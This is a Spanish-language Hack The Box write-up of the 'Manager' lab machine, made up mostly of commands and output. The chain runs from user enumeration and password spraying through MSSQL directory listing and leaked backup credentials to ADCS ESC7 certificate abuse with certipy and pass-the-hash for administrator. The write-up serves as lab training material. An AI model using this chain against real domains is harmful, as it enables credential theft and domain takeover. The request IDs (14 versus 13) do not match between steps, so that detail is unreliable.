Máquina Manager Hack the Box
Primero, se realiza una enumeración de todos los servicios para comprender a qué nos enfrentamos.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# cat nmap
# Nmap 7.94SVN scan initiated Sat Mar 2 20:01:44 2024 as: nmap -sS --min-rate 5000 -Pn -n -p- -sCV -o nmap 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up (0.17s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-03 08:03:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-03T08:04:39+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-03T08:04:37+00:00; +7h00m01s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2024-03-03T08:04:39+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-01T19:09:36
|_Not valid after: 2054-03-01T19:09:36
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-03T08:04:39+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-03T08:04:37+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
50285/tcp open msrpc Microsoft Windows RPC
64908/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-03T08:04:03
|_ start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 2 20:04:39 2024 -- 1 IP address (1 host up) scanned in 174.68 second
Al observar el servicio Kerberos en ejecución en el puerto 88, procederemos a realizar una enumeración de usuarios utilizando la herramienta kerbrute
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# ./kerbrute_linux_amd64 userenum -d manager.htb /mnt/angussMoody/Machines/Manager/usernames.txt --dc dc01.manager.htb -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/02/24 - Ronnie Flathers @ropnop
2024/03/02 22:15:52 > Using KDC(s):
2024/03/02 22:15:52 > dc01.manager.htb:88
2024/03/02 22:15:54 > [+] VALID USERNAME: administrator@manager.htb
2024/03/02 22:16:31 > [+] VALID USERNAME: cheng@manager.htb
2024/03/02 22:17:41 > [+] VALID USERNAME: guest@manager.htb
2024/03/02 22:19:04 > [+] VALID USERNAME: operator@manager.htb
2024/03/02 22:19:31 > [+] VALID USERNAME: raven@manager.htb
2024/03/02 22:19:41 > [+] VALID USERNAME: ryan@manager.htb
2024/03/02 22:20:37 > Done! Tested 81475 usernames (6 valid) in 285.015 seconds
Como resultado, obtenemos una lista de usuarios válidos dentro del sistema.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# kerbrute -users usernames.txt -domain manager.htb -dc-ip 10.10.11.236 -outputfile UserAD -threads 200
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Valid user => administrator
[*] Valid user => cheng
[*] Valid user => operator
[*] Valid user => raven
[*] Valid user => ryan
[*] No passwords were discovered :'(
También podemos llevar a cabo una enumeración utilizando la herramienta netexec, que es la actualización de CrackMapExec. Con esta herramienta, podemos obtener resultados similares, aunque un poco más completos.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# netexec smb manager.htb -u anonymous -p "" --rid-brute 10000
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\anonymous:
SMB 10.10.11.236 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.10.11.236 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.10.11.236 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.10.11.236 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.236 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.10.11.236 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.236 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.10.11.236 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.10.11.236 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.10.11.236 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.10.11.236 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\Operator (SidTypeUser)
Se realiza un ataque conocido como “password spray”. Utilizando el listado disponible, se ejecuta el ataque probando cada usuario y contraseña. Como resultado, se descubre que el usuario “operator” tiene la contraseña “operator”.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# netexec smb 10.10.11.236 -u UserAD -p UserAD --no-brute --continue-on-success
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
Con la herramienta netexec se lleva a cabo una validación para determinar qué otros servicios se pueden acceder utilizando estas credenciales. Se observa que también se tiene acceso a MSSQL.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# netexec mssql 10.10.11.236 -u operator -p operator
MSSQL 10.10.11.236 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.10.11.236 1433 DC01 [+] manager.htb\operator:operator
con los scripts de impacket en este caso, con impacket-mssqlclient, para establecer una conexión utilizando las credenciales del usuario “operator”.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# impacket-mssqlclient -windows-auth manager.htb/operator:operator@manager.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>
Después de realizar una enumeración y basándonos en el artículo de GOAD - part 7 - MSSQL de M4yFly se observa que es posible listar directorios en el sistema.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# impacket-mssqlclient -windows-auth manager.htb/operator:operator@manager.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)> exec master.sys.xp_dirtree 'c:\',1,1
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0
SQL (MANAGER\Operator guest@master)>
Se enumera el directorio wwwroot, el cual contiene algunos archivos interesantes como web.config, así como un backup comprimido en zip con el nombre website-backup-27-07-23-old.zip
SQL (MANAGER\Operator guest@master)> exec master.sys.xp_dirtree 'c:\inetpub\wwwroot\',1,1
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
SQL (MANAGER\Operator guest@master)>
Este directorio sirve como raíz para los contenidos estáticos de la página web.
Se realiza una consulta a la máquina utilizando la herramienta curl, para visualizar el código de la página web.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# curl http://10.10.11.236
<!DOCTYPE html>
<html>
<head>
<!-- Basic -->
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<!-- Mobile Metas -->
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<!-- Site Metas -->
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="author" content="" />
<title>Manager</title>
...
...
...
</section>
<!-- end client section -->
</div>
<!-- info section -->
<section class="info_section layout_padding">
<div class="footer_contact">
<div class="heading_container">
<h2>
Contact Us
</h2>
</div>
<div class="box">
<a href="" class="img-box">
<img src="images/location.png" alt="" class="img-1">
<img src="images/location-o.png" alt="" class="img-2">
</a>
<a href="" class="img-box">
<img src="images/call.png" alt="" class="img-1">
<img src="images/call-o.png" alt="" class="img-2">
</a>
<a href="" class="img-box">
<img src="images/envelope.png" alt="" class="img-1">
<img src="images/envelope-o.png" alt="" class="img-2">
</a>
</div>
</div>
</section>
<!-- end info section -->
<!-- footer section -->
<section class="container-fluid footer_section">
<p>
Copyright © 2019 All Rights Reserved By
<a href="https://html.design/">Free Html Templates</a>
</p>
</section>
<!-- footer section -->
<script type="text/javascript" src="js/jquery-3.4.1.min.js"></script>
<script type="text/javascript" src="js/bootstrap.js"></script>
</body>
</html>
Con la misma herramienta curl, podemos consultar y descargar el archivo website-backup-27-07-23-old.zip.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# curl http://10.10.11.236/website-backup-27-07-23-old.zip --output web.zip
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1020k 100 1020k 0 0 273k 0 0:00:03 0:00:03 --:--:-- 273k
Aunque también se puede realizar esto de manera más rápida y sencilla desde un navegador, consumiendo el servicio HTTP de la máquina para descargar el backup.
Con la herramienta unzip se puede extraer el contenido de este archivo y observar que trae varios archivos para investigar.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/Backup]
└─# ll
.rwxrwxrwx 1.0M angussmoody 3 Mar 00:14 web.zip
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/Backup]
└─# unzip web.zip
Archive: web.zip
inflating: .old-conf.xml
inflating: about.html
inflating: contact.html
inflating: css/bootstrap.css
inflating: css/responsive.css
inflating: css/style.css
inflating: css/style.css.map
inflating: css/style.scss
inflating: images/about-img.png
inflating: images/body_bg.jpg
extracting: images/call.png
extracting: images/call-o.png
inflating: images/client.jpg
inflating: images/contact-img.jpg
extracting: images/envelope.png
extracting: images/envelope-o.png
inflating: images/hero-bg.jpg
extracting: images/location.png
extracting: images/location-o.png
extracting: images/logo.png
inflating: images/menu.png
extracting: images/next.png
extracting: images/next-white.png
inflating: images/offer-img.jpg
inflating: images/prev.png
extracting: images/prev-white.png
extracting: images/quote.png
extracting: images/s-1.png
extracting: images/s-2.png
extracting: images/s-3.png
extracting: images/s-4.png
extracting: images/search-icon.png
inflating: index.html
inflating: js/bootstrap.js
inflating: js/jquery-3.4.1.min.js
inflating: service.html
Dentro de este listado, se observan directorios de imágenes, CSS, JS, y varios archivos adicionales.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/Backup]
└─# ls -la
.rwxrwxrwx 698 angussmoody 27 Jul 2023 .old-conf.xml
.rwxrwxrwx 5.4k angussmoody 27 Jul 2023 about.html
.rwxrwxrwx 5.3k angussmoody 27 Jul 2023 contact.html
drwxrwxrwx - angussmoody 3 Mar 00:15 css
drwxrwxrwx - angussmoody 3 Mar 00:15 images
.rwxrwxrwx 18k angussmoody 27 Jul 2023 index.html
drwxrwxrwx - angussmoody 3 Mar 00:15 js
.rwxrwxrwx 7.9k angussmoody 27 Jul 2023 service.html
.rwxrwxrwx 1.0M angussmoody 3 Mar 00:14 web.zip
Al leer el archivo oculto .old-conf.xml, se descubre que contiene un usuario llamado “raven” y una contraseña “R4v3nBe5tD3veloP3r!123”
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/Backup]
└─# cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
Con la herramienta netexec, se puede verificar en qué servicios estas credenciales responden, similar a como se hizo con el usuario “operator”. En este caso, se encuentra que el usuario “raven” tiene conexión con el servicio WinRM.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/Backup]
└─# netexec smb 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] Connection Error: The NETBIOS connection with the remote host timed out.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/Backup]
└─# netexec winrm 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)
Se procede a conectarse utilizando la herramienta evil-winrm para obtener una shell con PowerShell, lo que permite obtener la primera flag del usuario.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager]
└─# evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Raven\Desktop> dir
Directory: C:\Users\Raven\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/4/2024 11:45 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Raven\Desktop> cat user.txt
d39637f5235d3f417ba6d0f15deb6e2d
*Evil-WinRM* PS C:\Users\Raven\Desktop>
Después de realizar varias enumeraciones y con la ayuda de la guía GOAD - part 6 - ADCS se evidencia que el sistema puede ser vulnerable a ESC7.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/certipy]
└─# certipy-ad find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -dc-ip 10.10.11.236 -stdout
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
Aunque el ataque a ESC7 no está especificado en la guía de GOAD, podemos seguir la guía de Oliver Lyak con su herramienta Certipy-AD y la guía para el ataque a ESC7
Requisitos previos
Para que esta técnica funcione, es necesario que el usuario tenga el derecho de acceso “Gestionar Certificados” y que la plantilla de certificado SubCA esté habilitada. Esto se puede lograr teniendo el derecho de acceso “Gestionar CA”.
La técnica se basa en que los usuarios con los derechos de acceso “Gestionar CA” y “Gestionar Certificados” pueden emitir solicitudes de certificados fallidas. La plantilla de certificados SubCA es vulnerable a ESC1, pero solo los administradores pueden inscribirse en la plantilla. Por lo tanto, un usuario puede solicitar inscribirse en la SubCA, lo que será denegado, pero un administrador puede emitirlo después.
Si solo se dispone del derecho de acceso “Gestionar CA”, se puede otorgar el derecho de acceso “Gestionar Certificados” agregando al usuario como nuevo administrador.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/certipy]
└─# certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
La plantilla SubCA puede habilitarse en la CA con el parámetro -enable-template. Por defecto, la plantilla SubCA está habilitada.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/certipy]
└─# certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Si se han cumplido los requisitos previos para este ataque, se puede comenzar solicitando un certificado basado en la plantilla SubCA. Aunque esta solicitud será denegada, se guarda la clave privada y se anota el ID de la solicitud.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/certipy]
└─# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 14
Would you like to save the private key? (y/N) y
[*] Saved private key to 14.key
[-] Failed to request certificate
Con los permisos de “Manage CA” y “Manage Certificates”, se puede proceder a emitir la solicitud de certificado fallida utilizando el comando “ca” con el parámetro “-issue-request
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/certipy]
└─# certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Se puede recuperar el certificado emitido utilizando el comando “req” con el parámetro “-retrieve
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/certipy]
└─# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 13
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
Y por último, se puede utilizar el nuevo certificado para autenticarse y obtener el HASH del usuario “administrator”, pero parece que está generando un error, lo que sugiere que no estamos sincronizados con el servidor.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/certipy]
└─# certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Con la herramienta rdate, se puede sincronizar el sistema a este servidor.
┌──(angussmoody㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/certipy]
└─$ sudo rdate -n 10.10.11.236
[sudo] password for angussmoody:
Tue Mar 5 03:32:02 -05 2024
Al ejecutar nuevamente el comando, ahora se obtiene el hash NTLM del usuario “administrator”. Con este hash, se pueden llevar a cabo diversas consultas y ataques.
┌──(root㉿angussMoody)-[/mnt/angussMoody/Machines/Manager/certipy]
└─# certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
Para esta máquina, se procederá a conectarse utilizando la herramienta evil-winrm para obtener una shell y así poder acceder a la segunda flag de administrador.
┌──(root㉿angussMoody)-[/home/angussmoody]
└─# evil-winrm -i 10.10.11.236 -u administrator -H 'ae5064c2f62317332c88629e025924ef'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/4/2024 11:45 PM 34 root.txt
c*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
9af0ce63a1fb1a12cda05dd2aa1bc450
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
